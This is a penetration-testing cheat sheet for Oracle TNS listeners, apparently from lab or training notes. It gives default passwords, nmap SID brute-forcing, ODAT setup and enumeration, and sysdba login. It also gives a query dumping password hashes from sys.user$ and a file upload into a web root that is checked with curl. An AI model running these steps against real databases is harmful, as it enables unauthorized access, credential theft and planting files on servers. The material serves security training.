# Pentesting Oracle TNS

## Overview

* Default port: TCP 1521 (Oracle TNS Listener)
* Default passwords: Oracle 9 = `CHANGE_ON_INSTALL`, DBSNMP = `dbsnmp`

## Config Files

* Client-side: `$ORACLE_HOME/network/admin/tnsnames.ora`
* Server-side: `$ORACLE_HOME/network/admin/listener.ora`
* PL/SQL Exclusion List: `$ORACLE_HOME/sqldeveloper/`

## Scanning

```
sudo nmap -p1521 -sV 10.129.204.235 --open
sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute
```

## ODAT Setup

```
sudo apt-get install -y build-essential python3-dev libaio1
pip3 install colorlog termcolor passlib python-libnmap pycryptodome
git clone https://github.com/quentinhardy/odat.git && cd odat/
git submodule init && git submodule update
sudo apt-get install python3-scapy -y
```

## ODAT Enumeration

```
./odat.py all -s 10.129.204.235
```

## SQLplus

```
sqlplus scott/tiger@10.129.204.235/XE
sqlplus scott/tiger@10.129.204.235/XE as sysdba
```

Fix shared library error:

```
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig
```

## SQL Commands

```sql
select table_name from all_tables;
select * from user_role_privs;
select name, password from sys.user$;
```

## File Upload via ODAT

```
echo "Oracle File Upload Test" > testing.txt
./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt
curl -X GET http://10.129.204.235/testing.txt
```

## Default Web Root Paths

| OS      | Path               |
| ------- | ------------------ |
| Linux   | /var/www/html      |
| Windows | C:\inetpub\wwwroot |